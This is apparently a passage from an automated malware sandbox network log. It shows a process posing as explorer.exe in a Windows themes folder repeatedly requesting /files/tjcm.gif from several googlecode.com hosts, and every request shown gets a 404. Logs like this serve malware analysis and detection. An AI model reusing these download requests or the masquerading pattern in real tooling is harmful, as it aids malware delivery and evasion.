{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:39.821660995 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	60931	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:40.170042992 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:40.868217945 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:40 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:40.868238926 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	60932	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:41.239294052 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:41.935189009 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:41 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:41.935215950 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	60933	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:42.634526014 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:43.318037987 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:43 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:43.318056107 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	60934	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:43.758307934 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:44.456948042 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:44 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:44.456976891 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	60935	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:45.015721083 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:45.574392080 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:45 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:45.574419975 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	60936	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:45.936309099 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:46.650589943 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:46 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:46.650604010 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	60937	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:46.997848988 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:47.683612108 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:47 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:47.683636904 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	60938	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:48.119525909 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
